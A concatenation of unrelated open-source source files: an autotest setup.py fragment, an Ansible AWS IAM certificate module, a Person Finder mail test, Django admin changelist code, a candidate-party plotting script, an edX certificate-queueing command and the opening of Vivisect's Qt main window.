database_legacy.setup.get_packages() +
tko.setup.get_packages() +
utils.setup.get_packages() +
mirror.setup.get_packages() +
installation_support.setup.get_packages())
def get_data_files():
return (client.setup.get_data_files() +
tko.setup.get_data_files() +
utils.setup.get_data_files() +
mirror.setup.get_data_files())
def get_package_data():
return _combine_dicts([
_fix_data_paths(client.setup.get_package_data()),
_fix_data_paths(frontend.setup.get_package_data()),
_fix_data_paths(cli.setup.get_package_data()),
_fix_data_paths(server.setup.get_package_data()),
_fix_data_paths(scheduler.setup.get_package_data()),
_fix_data_paths(database_legacy.setup.get_package_data()),
_fix_data_paths(utils.setup.get_package_data())
])
def get_scripts():
return (client.setup.get_scripts() +
frontend.setup.get_scripts() +
cli.setup.get_scripts() +
server.setup.get_scripts() +
scheduler.setup.get_scripts() +
database_legacy.setup.get_scripts() +
tko.setup.get_scripts() +
installation_support.setup.get_scripts())
def run():
setup(name='autotest',
description='Autotest test framework',
maintainer='Lucas Meneghel Rodrigues',
maintainer_email='lmr@redhat.com',
version=version.get_version(),
url='http://autotest.github.com',
package_dir=get_package_dir(),
package_data=get_package_data(),
packages=get_packages(),
scripts=get_scripts(),
data_files=get_data_files(),
cmdclass=cmdclass,
command_options={'build_doc': {'source_dir':
('setup.py', 'documentation/source')}}
)
if __name__ == '__main__':
run()
| gpl-2.0 |
brokenjacobs/ansible | lib/ansible/modules/cloud/amazon/iam_cert.py | 5 | 12176 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: iam_cert
short_description: Manage server certificates for use on ELBs and CloudFront
description:
- Allows for the management of server certificates
version_added: "2.0"
options:
name:
description:
- Name of certificate to add, update or remove.
required: true
new_name:
description:
- When present, this will update the name of the cert with the value passed here.
required: false
new_path:
description:
- When present, this will update the path of the cert with the value passed here.
required: false
state:
description:
- Whether to create, delete certificate. When present is specified it will attempt to make an update if new_path or new_name is specified.
required: true
default: null
choices: [ "present", "absent" ]
path:
description:
- When creating or updating, specify the desired path of the certificate
required: false
default: "/"
cert_chain:
description:
- The CA certificate chain in PEM encoded format.
- Note that prior to 2.4, this parameter expected a path to a file. Since 2.4 this is now accomplished using a lookup plugin. See examples for detail
required: false
default: null
cert:
description:
- The certificate body in PEM encoded format.
- Note that prior to 2.4, this parameter expected a path to a file. Since 2.4 this is now accomplished using a lookup plugin. See examples for detail
required: false
key:
description:
- The key of the certificate in PEM encoded format.
- Note that prior to 2.4, this parameter expected a path to a file. Since 2.4 this is now accomplished using a lookup plugin. See examples for detail
dup_ok:
description:
- By default the module will not upload a certificate that is already uploaded into AWS. If set to True, it will upload the certificate as
long as the name is unique.
required: false
default: False
requirements: [ "boto" ]
author: Jonathan I. Davila
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Basic server certificate upload from local file
- iam_cert:
name: very_ssl
state: present
cert: "{{ lookup('file', 'path/to/cert') }}"
key: "{{ lookup('file', 'path/to/key') }}"
cert_chain: "{{ lookup('file', 'path/to/certchain') }}"
# Server certificate upload using key string
- iam_cert:
name: very_ssl
state: present
path: "/a/cert/path/"
cert: body_of_somecert
key: vault_body_of_privcertkey
cert_chain: body_of_myverytrustedchain
'''
import json
import sys
try:
import boto
import boto.iam
import boto.ec2
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def boto_exception(err):
'''generic error message handler'''
if hasattr(err, 'error_message'):
error = err.error_message
elif hasattr(err, 'message'):
error = err.message
else:
error = '%s: %s' % (Exception, err)
return error
def cert_meta(iam, name):
opath = iam.get_server_certificate(name).get_server_certificate_result.\
server_certificate.\
server_certificate_metadata.\
path
ocert = iam.get_server_certificate(name).get_server_certificate_result.\
server_certificate.\
certificate_body
ocert_id = iam.get_server_certificate(name).get_server_certificate_result.\
server_certificate.\
server_certificate_metadata.\
server_certificate_id
upload_date = iam.get_server_certificate(name).get_server_certificate_result.\
server_certificate.\
server_certificate_metadata.\
upload_date
exp = iam.get_server_certificate(name).get_server_certificate_result.\
server_certificate.\
server_certificate_metadata.\
expiration
return opath, ocert, ocert_id, upload_date, exp
def dup_check(module, iam, name, new_name, cert, orig_cert_names, orig_cert_bodies, dup_ok):
update=False
if any(ct in orig_cert_names for ct in [name, new_name]):
for i_name in [name, new_name]:
if i_name is None:
continue
if cert is not None:
try:
c_index=orig_cert_names.index(i_name)
except NameError:
continue
else:
# NOTE: remove the carriage return to strictly compare the cert bodies.
slug_cert = cert.replace('\r', '')
slug_orig_cert_bodies = orig_cert_bodies[c_index].replace('\r', '')
if slug_orig_cert_bodies == slug_cert:
update=True
break
elif slug_orig_cert_bodies != slug_cert:
module.fail_json(changed=False, msg='A cert with the name %s already exists and'
' has a different certificate body associated'
' with it. Certificates cannot have the same name' % i_name)
else:
update=True
break
elif cert in orig_cert_bodies and not dup_ok:
for crt_name, crt_body in zip(orig_cert_names, orig_cert_bodies):
if crt_body == cert:
module.fail_json(changed=False, msg='This certificate already'
' exists under the name %s' % crt_name)
return update
def cert_action(module, iam, name, cpath, new_name, new_path, state,
cert, key, chain, orig_cert_names, orig_cert_bodies, dup_ok):
if state == 'present':
update = dup_check(module, iam, name, new_name, cert, orig_cert_names,
orig_cert_bodies, dup_ok)
if update:
opath, ocert, ocert_id, upload_date, exp = cert_meta(iam, name)
changed=True
if new_name and new_path:
iam.update_server_cert(name, new_cert_name=new_name, new_path=new_path)
module.exit_json(changed=changed, original_name=name, new_name=new_name,
original_path=opath, new_path=new_path, cert_body=ocert,
upload_date=upload_date, expiration_date=exp)
elif new_name and not new_path:
iam.update_server_cert(name, new_cert_name=new_name)
module.exit_json(changed=changed, original_name=name, new_name=new_name,
cert_path=opath, cert_body=ocert,
upload_date=upload_date, expiration_date=exp)
elif not new_name and new_path:
iam.update_server_cert(name, new_path=new_path)
module.exit_json(changed=changed, name=new_name,
original_path=opath, new_path=new_path, cert_body=ocert,
upload_date=upload_date, expiration_date=exp)
else:
changed=False
module.exit_json(changed=changed, name=name, cert_path=opath, cert_body=ocert,
upload_date=upload_date, expiration_date=exp,
msg='No new path or name specified. No changes made')
else:
changed=True
iam.upload_server_cert(name, cert, key, cert_chain=chain, path=cpath)
opath, ocert, ocert_id, upload_date, exp = cert_meta(iam, name)
module.exit_json(changed=changed, name=name, cert_path=opath, cert_body=ocert,
upload_date=upload_date, expiration_date=exp)
elif state == 'absent':
if name in orig_cert_names:
changed=True
iam.delete_server_cert(name)
module.exit_json(changed=changed, deleted_cert=name)
else:
changed=False
module.exit_json(changed=changed, msg='Certificate with the name %s already absent' % name)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(
default=None, required=True, choices=['present', 'absent']),
name=dict(default=None, required=False),
cert=dict(default=None, required=False),
key=dict(default=None, required=False, no_log=True),
cert_chain=dict(default=None, required=False),
new_name=dict(default=None, required=False),
path=dict(default='/', required=False),
new_path=dict(default=None, required=False),
dup_ok=dict(default=False, required=False, type='bool')
)
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=[],
)
if not HAS_BOTO:
module.fail_json(msg="Boto is required for this module")
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
try:
if region:
iam = connect_to_aws(boto.iam, region, **aws_connect_kwargs)
else:
iam = boto.iam.connection.IAMConnection(**aws_connect_kwargs)
except boto.exception.NoAuthHandlerFound as e:
module.fail_json(msg=str(e))
state = module.params.get('state')
name = module.params.get('name')
path = module.params.get('path')
new_name = module.params.get('new_name')
new_path = module.params.get('new_path')
cert_chain = module.params.get('cert_chain')
dup_ok = module.params.get('dup_ok')
if state == 'present':
if module.params.get('cert') is not None:
cert = module.params.get('cert')
if module.params.get('key') is not None:
key = module.params.get('key')
if module.params.get('cert_chain') is not None:
cert_chain = module.params.get('cert_chain')
else:
key=cert=chain=None
orig_certs = [ctb['server_certificate_name'] for ctb in \
iam.get_all_server_certs().\
list_server_certificates_result.\
server_certificate_metadata_list]
orig_bodies = [iam.get_server_certificate(thing).\
get_server_certificate_result.\
certificate_body \
for thing in orig_certs]
if new_name == name:
new_name = None
if new_path == path:
new_path = None
changed = False
try:
cert_action(module, iam, name, path, new_name, new_path, state,
cert, key, cert_chain, orig_certs, orig_bodies, dup_ok)
except boto.exception.BotoServerError as err:
module.fail_json(changed=changed, msg=str(err), debug=[cert,key])
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| gpl-3.0 |
g19-hs/personfinder | tests/test_send_mail.py | 16 | 2145 | #!/usr/bin/python2.7
# Copyright 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for send_mail.py."""
from google.appengine.api import mail
from google.appengine.api import mail_errors
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
import logging
import model
import mox
import os
import send_mail
import test_handler
import unittest
import webob
class SendMailTests(unittest.TestCase):
'''Test the send_mail error handling.'''
def test_email_fail(self):
subject = 'test'
to = 'bad_email_address'
sender = 'me@example.com'
body = 'stuff'
mymox = mox.Mox()
mymox.StubOutWithMock(logging, 'error')
logging.error('EmailSender (to: %s, subject: %s), '
'failed with exception %s' % (to, subject, 'exception'))
mymox.StubOutWithMock(mail, 'send_mail')
mail.send_mail(sender=sender,
subject=subject,
to=to,
body=body).AndRaise(mail_errors.Error('exception'))
handler = send_mail.EmailSender()
repo = 'haiti'
model.Repo(key_name=repo).put()
request = webapp.Request(
webob.Request.blank(
'/admin/send_mail?to=%s&subject=%s&sender=%s' %
(to, subject, sender)).environ)
request.method = 'POST'
request.body = 'body=%s' % body
handler.initialize(request, webapp.Response())
mymox.ReplayAll()
handler.post()
# shouldn't raise an error.
assert True
mymox.VerifyAll()
| apache-2.0 |
bunnyitvn/webptn | build/lib.linux-i686-2.7/django/contrib/admin/views/main.py | 85 | 16606 | import operator
from functools import reduce
from django.core.exceptions import SuspiciousOperation, ImproperlyConfigured
from django.core.paginator import InvalidPage
from django.core.urlresolvers import reverse
from django.db import models
from django.db.models.fields import FieldDoesNotExist
from django.utils.datastructures import SortedDict
from django.utils.encoding import force_str, force_text
from django.utils.translation import ugettext, ugettext_lazy
from django.utils.http import urlencode
from django.contrib.admin import FieldListFilter
from django.contrib.admin.options import IncorrectLookupParameters
from django.contrib.admin.util import (quote, get_fields_from_path,
lookup_needs_distinct, prepare_lookup_value)
# Changelist settings
ALL_VAR = 'all'
ORDER_VAR = 'o'
ORDER_TYPE_VAR = 'ot'
PAGE_VAR = 'p'
SEARCH_VAR = 'q'
TO_FIELD_VAR = 't'
IS_POPUP_VAR = 'pop'
ERROR_FLAG = 'e'
IGNORED_PARAMS = (
ALL_VAR, ORDER_VAR, ORDER_TYPE_VAR, SEARCH_VAR, IS_POPUP_VAR, TO_FIELD_VAR)
# Text to display within change-list table cells if the value is blank.
EMPTY_CHANGELIST_VALUE = ugettext_lazy('(None)')
class ChangeList(object):
def __init__(self, request, model, list_display, list_display_links,
list_filter, date_hierarchy, search_fields, list_select_related,
list_per_page, list_max_show_all, list_editable, model_admin):
self.model = model
self.opts = model._meta
self.lookup_opts = self.opts
self.root_query_set = model_admin.queryset(request)
self.list_display = list_display
self.list_display_links = list_display_links
self.list_filter = list_filter
self.date_hierarchy = date_hierarchy
self.search_fields = search_fields
self.list_select_related = list_select_related
self.list_per_page = list_per_page
self.list_max_show_all = list_max_show_all
self.model_admin = model_admin
# Get search parameters from the query string.
try:
self.page_num = int(request.GET.get(PAGE_VAR, 0))
except ValueError:
self.page_num = 0
self.show_all = ALL_VAR in request.GET
self.is_popup = IS_POPUP_VAR in request.GET
self.to_field = request.GET.get(TO_FIELD_VAR)
self.params = dict(request.GET.items())
if PAGE_VAR in self.params:
del self.params[PAGE_VAR]
if ERROR_FLAG in self.params:
del self.params[ERROR_FLAG]
if self.is_popup:
self.list_editable = ()
else:
self.list_editable = list_editable
self.query = request.GET.get(SEARCH_VAR, '')
self.query_set = self.get_query_set(request)
self.get_results(request)
if self.is_popup:
title = ugettext('Select %s')
else:
title = ugettext('Select %s to change')
self.title = title % force_text(self.opts.verbose_name)
self.pk_attname = self.lookup_opts.pk.attname
def get_filters(self, request):
lookup_params = self.params.copy() # a dictionary of the query string
use_distinct = False
# Remove all the parameters that are globally and systematically
# ignored.
for ignored in IGNORED_PARAMS:
if ignored in lookup_params:
del lookup_params[ignored]
# Normalize the types of keys
for key, value in lookup_params.items():
if not isinstance(key, str):
# 'key' will be used as a keyword argument later, so Python
# requires it to be a string.
del lookup_params[key]
lookup_params[force_str(key)] = value
if not self.model_admin.lookup_allowed(key, value):
raise SuspiciousOperation("Filtering by %s not allowed" % key)
filter_specs = []
if self.list_filter:
for list_filter in self.list_filter:
if callable(list_filter):
# This is simply a custom list filter class.
spec = list_filter(request, lookup_params,
self.model, self.model_admin)
else:
field_path = None
if isinstance(list_filter, (tuple, list)):
# This is a custom FieldListFilter class for a given field.
field, field_list_filter_class = list_filter
else:
# This is simply a field name, so use the default
# FieldListFilter class that has been registered for
# the type of the given field.
field, field_list_filter_class = list_filter, FieldListFilter.create
if not isinstance(field, models.Field):
field_path = field
field = get_fields_from_path(self.model, field_path)[-1]
spec = field_list_filter_class(field, request, lookup_params,
self.model, self.model_admin, field_path=field_path)
# Check if we need to use distinct()
use_distinct = (use_distinct or
lookup_needs_distinct(self.lookup_opts,
field_path))
if spec and spec.has_output():
filter_specs.append(spec)
# At this point, all the parameters used by the various ListFilters
# have been removed from lookup_params, which now only contains other
# parameters passed via the query string. We now loop through the
# remaining parameters both to ensure that all the parameters are valid
# fields and to determine if at least one of them needs distinct(). If
# the lookup parameters aren't real fields, then bail out.
try:
for key, value in lookup_params.items():
lookup_params[key] = prepare_lookup_value(key, value)
use_distinct = (use_distinct or
lookup_needs_distinct(self.lookup_opts, key))
return filter_specs, bool(filter_specs), lookup_params, use_distinct
except FieldDoesNotExist as e:
raise IncorrectLookupParameters(e)
def get_query_string(self, new_params=None, remove=None):
if new_params is None: new_params = {}
if remove is None: remove = []
p = self.params.copy()
for r in remove:
for k in list(p):
if k.startswith(r):
del p[k]
for k, v in new_params.items():
if v is None:
if k in p:
del p[k]
else:
p[k] = v
return '?%s' % urlencode(sorted(p.items()))
def get_results(self, request):
paginator = self.model_admin.get_paginator(request, self.query_set, self.list_per_page)
# Get the number of objects, with admin filters applied.
result_count = paginator.count
# Get the total number of objects, with no admin filters applied.
# Perform a slight optimization: Check to see whether any filters were
# given. If not, use paginator.hits to calculate the number of objects,
# because we've already done paginator.hits and the value is cached.
if not self.query_set.query.where:
full_result_count = result_count
else:
full_result_count = self.root_query_set.count()
can_show_all = result_count <= self.list_max_show_all
multi_page = result_count > self.list_per_page
# Get the list of objects to display on this page.
if (self.show_all and can_show_all) or not multi_page:
result_list = self.query_set._clone()
else:
try:
result_list = paginator.page(self.page_num+1).object_list
except InvalidPage:
raise IncorrectLookupParameters
self.result_count = result_count
self.full_result_count = full_result_count
self.result_list = result_list
self.can_show_all = can_show_all
self.multi_page = multi_page
self.paginator = paginator
def _get_default_ordering(self):
ordering = []
if self.model_admin.ordering:
ordering = self.model_admin.ordering
elif self.lookup_opts.ordering:
ordering = self.lookup_opts.ordering
return ordering
def get_ordering_field(self, field_name):
"""
Returns the proper model field name corresponding to the given
field_name to use for ordering. field_name may either be the name of a
proper model field or the name of a method (on the admin or model) or a
callable with the 'admin_order_field' attribute. Returns None if no
proper model field name can be matched.
"""
try:
field = self.lookup_opts.get_field(field_name)
return field.name
except models.FieldDoesNotExist:
# See whether field_name is a name of a non-field
# that allows sorting.
if callable(field_name):
attr = field_name
elif hasattr(self.model_admin, field_name):
attr = getattr(self.model_admin, field_name)
else:
attr = getattr(self.model, field_name)
return getattr(attr, 'admin_order_field', None)
def get_ordering(self, request, queryset):
"""
Returns the list of ordering fields for the change list.
First we check the get_ordering() method in model admin, then we check
the object's default ordering. Then, any manually-specified ordering
from the query string overrides anything. Finally, a deterministic
order is guaranteed by ensuring the primary key is used as the last
ordering field.
"""
params = self.params
ordering = list(self.model_admin.get_ordering(request)
or self._get_default_ordering())
if ORDER_VAR in params:
# Clear ordering and used params
ordering = []
order_params = params[ORDER_VAR].split('.')
for p in order_params:
try:
none, pfx, idx = p.rpartition('-')
field_name = self.list_display[int(idx)]
order_field = self.get_ordering_field(field_name)
if not order_field:
continue # No 'admin_order_field', skip it
ordering.append(pfx + order_field)
except (IndexError, ValueError):
continue # Invalid ordering specified, skip it.
# Add the given query's ordering fields, if any.
ordering.extend(queryset.query.order_by)
# Ensure that the primary key is systematically present in the list of
# ordering fields so we can guarantee a deterministic order across all
# database backends.
pk_name = self.lookup_opts.pk.name
if not (set(ordering) & set(['pk', '-pk', pk_name, '-' + pk_name])):
# The two sets do not intersect, meaning the pk isn't present. So
# we add it.
ordering.append('-pk')
return ordering
def get_ordering_field_columns(self):
"""
Returns a SortedDict of ordering field column numbers and asc/desc
"""
# We must cope with more than one column having the same underlying sort
# field, so we base things on column numbers.
ordering = self._get_default_ordering()
ordering_fields = SortedDict()
if ORDER_VAR not in self.params:
# for ordering specified on ModelAdmin or model Meta, we don't know
# the right column numbers absolutely, because there might be more
# than one column associated with that ordering, so we guess.
for field in ordering:
if field.startswith('-'):
field = field[1:]
order_type = 'desc'
else:
order_type = 'asc'
for index, attr in enumerate(self.list_display):
if self.get_ordering_field(attr) == field:
ordering_fields[index] = order_type
break
else:
for p in self.params[ORDER_VAR].split('.'):
none, pfx, idx = p.rpartition('-')
try:
idx = int(idx)
except ValueError:
continue # skip it
ordering_fields[idx] = 'desc' if pfx == '-' else 'asc'
return ordering_fields
def get_query_set(self, request):
# First, we collect all the declared list filters.
(self.filter_specs, self.has_filters, remaining_lookup_params,
use_distinct) = self.get_filters(request)
# Then, we let every list filter modify the queryset to its liking.
qs = self.root_query_set
for filter_spec in self.filter_specs:
new_qs = filter_spec.queryset(request, qs)
if new_qs is not None:
qs = new_qs
try:
# Finally, we apply the remaining lookup parameters from the query
# string (i.e. those that haven't already been processed by the
# filters).
qs = qs.filter(**remaining_lookup_params)
except (SuspiciousOperation, ImproperlyConfigured):
# Allow certain types of errors to be re-raised as-is so that the
# caller can treat them in a special way.
raise
except Exception as e:
# Every other error is caught with a naked except, because we don't
# have any other way of validating lookup parameters. They might be
# invalid if the keyword arguments are incorrect, or if the values
# are not in the correct type, so we might get FieldError,
# ValueError, ValidationError, or ?.
raise IncorrectLookupParameters(e)
# Use select_related() if one of the list_display options is a field
# with a relationship and the provided queryset doesn't already have
# select_related defined.
if not qs.query.select_related:
if self.list_select_related:
qs = qs.select_related()
else:
for field_name in self.list_display:
try:
field = self.lookup_opts.get_field(field_name)
except models.FieldDoesNotExist:
pass
else:
if isinstance(field.rel, models.ManyToOneRel):
qs = qs.select_related()
break
# Set ordering.
ordering = self.get_ordering(request, qs)
qs = qs.order_by(*ordering)
# Apply keyword searches.
def construct_search(field_name):
if field_name.startswith('^'):
return "%s__istartswith" % field_name[1:]
elif field_name.startswith('='):
return "%s__iexact" % field_name[1:]
elif field_name.startswith('@'):
return "%s__search" % field_name[1:]
else:
return "%s__icontains" % field_name
if self.search_fields and self.query:
orm_lookups = [construct_search(str(search_field))
for search_field in self.search_fields]
for bit in self.query.split():
or_queries = [models.Q(**{orm_lookup: bit})
for orm_lookup in orm_lookups]
qs = qs.filter(reduce(operator.or_, or_queries))
if not use_distinct:
for search_spec in orm_lookups:
if lookup_needs_distinct(self.lookup_opts, search_spec):
use_distinct = True
break
if use_distinct:
return qs.distinct()
else:
return qs
def url_for_result(self, result):
pk = getattr(result, self.pk_attname)
return reverse('admin:%s_%s_change' % (self.opts.app_label,
self.opts.module_name),
args=(quote(pk),),
current_app=self.model_admin.admin_site.name)
| bsd-3-clause |
Statistica/676-candidates | candidates_by_party_greater_100k.py | 1 | 1686 | # -*- coding: utf-8 -*-
# Written by Jonathan Saewitz, released May 24th, 2016 for Statisti.ca
# Released under the MIT License (https://opensource.org/licenses/MIT)
import csv, plotly.plotly as plotly, plotly.graph_objs as go, requests
from collections import Counter
from bs4 import BeautifulSoup
#the following candidates raised $100,000 or more (from https://github.com/Statistica/676-candidates/blob/master/amount_raised_by_candidate.py):
candidates=["QUARTEY, MARY AKU",
"LAWSON, EDGAR A",
"GILMORE, JAMES S III",
"STEIN, JILL",
"JOHNSON, GARY",
"CHAFEE, LINCOLN DAVENPORT MR.",
"EVERSON, MARK",
"PATAKI, GEORGE E",
"WEBB, JAMES",
"WILSON, WILLIE",
"PERRY, JAMES R (RICK)",
"JINDAL, BOBBY",
"SANTORUM, RICHARD J.",
"HUCKABEE, MIKE",
"WILLIAMS, ELAINE WHIGHAM",
"GRAHAM, LINDSEY O",
"O'MALLEY, MARTIN JOSEPH",
"DE LA FUENTE, ROQUE ROCKY",
"WALKER, SCOTT",
"CHRISTIE, CHRISTOPHER J",
"FIORINA, CARLY",
"PAUL, RAND",
"KASICH, JOHN R",
"BUSH, JEB",
"RUBIO, MARCO",
"TRUMP, DONALD J",
"CARSON, BENJAMIN S SR MD",
"CRUZ, RAFAEL EDWARD \"TED\"",
"SANDERS, BERNARD",
"CLINTON, HILLARY RODHAM"
]
c=Counter()
with open('presidential_candidates.csv', 'r') as f:
reader=csv.reader(f)
reader.next() #skip the headers row
for row in reader: #loop through the candidates
if row[14] in candidates: #row[14] is the candidate's name
#checks if the current candidate we're looping through is one the candidates listed above
party=row[12]
c[party]+=1
fig = {
'data': [{
'labels': c.keys(),
'values': c.values(),
'type': 'pie'
}],
'layout': {'title': '2016 US Presidential Candidates\' Party Affiliation (only candidates who raised ≥$100,000)'}
}
plotly.plot(fig)
| mit |
teltek/edx-platform | lms/djangoapps/certificates/management/commands/ungenerated_certs.py | 16 | 6600 | """
Management command to find all students that need certificates for
courses that have finished, and put their cert requests on the queue.
"""
from __future__ import print_function
import datetime
import logging
from django.contrib.auth.models import User
from django.core.management.base import BaseCommand
from opaque_keys.edx.keys import CourseKey
from pytz import UTC
from six import text_type
from lms.djangoapps.certificates.api import generate_user_certificates
from lms.djangoapps.certificates.models import CertificateStatuses, certificate_status_for_student
from xmodule.modulestore.django import modulestore
LOGGER = logging.getLogger(__name__)
class Command(BaseCommand):
"""
Management command to find all students that need certificates
for courses that have finished and put their cert requests on the queue.
"""
help = """
Find all students that need certificates for courses that have finished and
put their cert requests on the queue.
If --user is given, only grade and certify the requested username.
Use the --noop option to test without actually putting certificates on the
queue to be generated.
"""
def add_arguments(self, parser):
parser.add_argument(
'-n', '--noop',
action='store_true',
dest='noop',
help="Don't add certificate requests to the queue"
)
parser.add_argument(
'--insecure',
action='store_true',
dest='insecure',
help="Don't use https for the callback url to the LMS, useful in http test environments"
)
parser.add_argument(
'-c', '--course',
metavar='COURSE_ID',
dest='course',
required=True,
help='Grade and generate certificates for a specific course'
)
parser.add_argument(
'-f', '--force-gen',
metavar='STATUS',
dest='force',
default=False,
help='Will generate new certificates for only those users whose entry in the certificate table matches '
'STATUS. STATUS can be generating, unavailable, deleted, error or notpassing.'
)
def handle(self, *args, **options):
LOGGER.info(
(
u"Starting to create tasks for ungenerated certificates "
u"with arguments %s and options %s"
),
text_type(args),
text_type(options)
)
# Will only generate a certificate if the current
# status is in the unavailable state, can be set
# to something else with the force flag
if options['force']:
valid_statuses = [getattr(CertificateStatuses, options['force'])]
else:
valid_statuses = [CertificateStatuses.unavailable]
# Print update after this many students
status_interval = 500
course = CourseKey.from_string(options['course'])
ended_courses = [course]
for course_key in ended_courses:
# prefetch all chapters/sequentials by saying depth=2
course = modulestore().get_course(course_key, depth=2)
enrolled_students = User.objects.filter(
courseenrollment__course_id=course_key
)
total = enrolled_students.count()
count = 0
start = datetime.datetime.now(UTC)
for student in enrolled_students:
count += 1
if count % status_interval == 0:
# Print a status update with an approximation of
# how much time is left based on how long the last
# interval took
diff = datetime.datetime.now(UTC) - start
timeleft = diff * (total - count) / status_interval
hours, remainder = divmod(timeleft.seconds, 3600)
minutes, _seconds = divmod(remainder, 60)
print("{0}/{1} completed ~{2:02}:{3:02}m remaining".format(count, total, hours, minutes))
start = datetime.datetime.now(UTC)
cert_status = certificate_status_for_student(student, course_key)['status']
LOGGER.info(
(
u"Student %s has certificate status '%s' "
u"in course '%s'"
),
student.id,
cert_status,
text_type(course_key)
)
if cert_status in valid_statuses:
if not options['noop']:
# Add the certificate request to the queue
ret = generate_user_certificates(
student,
course_key,
course=course,
insecure=options['insecure']
)
if ret == 'generating':
LOGGER.info(
(
u"Added a certificate generation task to the XQueue "
u"for student %s in course '%s'. "
u"The new certificate status is '%s'."
),
student.id,
text_type(course_key),
ret
)
else:
LOGGER.info(
(
u"Skipping certificate generation for "
u"student %s in course '%s' "
u"because the noop flag is set."
),
student.id,
text_type(course_key)
)
else:
LOGGER.info(
(
u"Skipped student %s because "
u"certificate status '%s' is not in %s"
),
student.id,
cert_status,
text_type(valid_statuses)
)
LOGGER.info(
(
u"Completed ungenerated certificates command "
u"for course '%s'"
),
text_type(course_key)
)
| agpl-3.0 |
bat-serjo/vivisect | vivisect/qt/main.py | 1 | 19470 | import os
import sys
import vstruct.qt as vs_qt
import envi.expression as e_expr
import envi.qt.config as e_q_config
import vqt.main as vq_main
import vqt.colors as vq_colors
import vqt.qpython as vq_python
import vqt.application as vq_app
import vivisect.cli as viv_cli
import vivisect.base as viv_base
import vivisect.vdbext as viv_vdbext
import vivisect.qt.tips as viv_q_tips
import vivisect.qt.views as viv_q_views
import vivisect.qt.memory as viv_q_memory
import vivisect.qt.remote as viv_q_remote
import vivisect.qt.ustruct as viv_q_ustruct
import vivisect.extensions as viv_extensions
import vivisect.qt.funcgraph as viv_q_funcgraph
import vivisect.qt.funcviews as viv_q_funcviews
import vivisect.qt.symboliks as viv_q_symboliks
import vivisect.remote.share as viv_share
from PyQt5 import QtCore
from PyQt5.QtWidgets import QInputDialog
from vqt.common import *
from vivisect.const import *
from vqt.main import getOpenFileName, getSaveFileName
from vqt.saveable import compat_isNone
dock_top = QtCore.Qt.TopDockWidgetArea
dock_right = QtCore.Qt.RightDockWidgetArea
class VQVivMainWindow(viv_base.VivEventDist, vq_app.VQMainCmdWindow):
# Child windows may emit this on "navigate" requests...
# vivNavSignal = QtCore.pyqtSignal(str, name='vivNavSignal')
vivMemColorSignal = QtCore.pyqtSignal(dict, name='vivMemColorSignal')
def __init__(self, vw):
self.vw = vw
vw._viv_gui = self
# DEV: hijack the workspace's vprint so that they get routed to the UI canvas
# and not out to the stdout
vw.vprint = self.vprint
viv_base.VivEventDist.__init__(self, vw=vw)
vq_app.VQMainCmdWindow.__init__(self, 'Vivisect', vw)
self.vqAddMenuField('&File.Open', self._menuFileOpen)
self.vqAddMenuField('&File.Save', self._menuFileSave)
self.vqAddMenuField('&File.Save As', self._menuFileSaveAs)
self.vqAddMenuField('&File.Save to Server', self._menuFileSaveServer)
self.vqAddMenuField('&File.Quit', self.close)
self.vqAddMenuField('&Edit.&Preferences', self._menuEditPrefs)
self.vqAddMenuField('&View.&Exports', self._menuViewExports)
self.vqAddMenuField('&View.&Functions', self._menuViewFunctions)
self.vqAddMenuField('&View.&Imports', self._menuViewImports)
self.vqAddMenuField('&View.&Names', self._menuViewNames)
self.vqAddMenuField('&View.&Memory', self._menuViewMemory)
self.vqAddMenuField('&View.&Function Graph', self._menuViewFuncGraph)
self.vqAddMenuField('&View.&Strings', self._menuViewStrings)
self.vqAddMenuField('&View.&Structures', self._menuViewStructs)
self.vqAddMenuField('&View.&Segments', self._menuViewSegments)
self.vqAddMenuField('&View.&Symboliks', self._menuViewSymboliks)
self.vqAddMenuField('&View.&Layouts.&Set Default', self._menuViewLayoutsSetDefault)
self.vqAddMenuField('&View.&Layouts.&Save', self._menuViewLayoutsSave)
self.vqAddMenuField('&View.&Layouts.&Load', self._menuViewLayoutsLoad)
self.vqAddMenuField('&Share.Share Workspace', self._menuShareWorkspace)
self.vqAddMenuField('&Share.Connect to Shared Workspace', self._menuShareConnect)
self.vqAddMenuField('&Share.Connect To Workspace Server', self._menuShareConnectServer)
self.vqAddMenuField('&Tools.&Python', self._menuToolsPython)
self.vqAddMenuField('&Tools.&Debug', self._menuToolsDebug)
self.vqAddMenuField('&Tools.&Structures.Add Namespace', self._menuToolsStructNames)
self.vqAddMenuField('&Tools.&Structures.New', self._menuToolsUStructNew)
self.vqAddDynMenu('&Tools.&Structures.&Edit', self._menuToolsUStructEdit)
self.vqAddDynMenu('&Tools.&Va Sets', self._menuToolsVaSets)
self.vqAddMenuField('&Window.&Fullscreen', self._menuWindowFullscreen)
self.vqAddMenuField('&Window.&Maximized', self._menuWindowMaximize)
self.vqAddMenuField('&Window.&Normal', self._menuWindowNormal)
self.vw.vprint('Welcome to Vivisect (Qt Edition)!')
self.vw.vprint('Random Tip: %s' % viv_q_tips.getRandomTip())
if len(self.vqGetDockWidgets()) == 0:
self.vw.vprint('\n')
#self.vw.vprint(' ')
self.vw.vprint('Looks like you have an empty layout!')
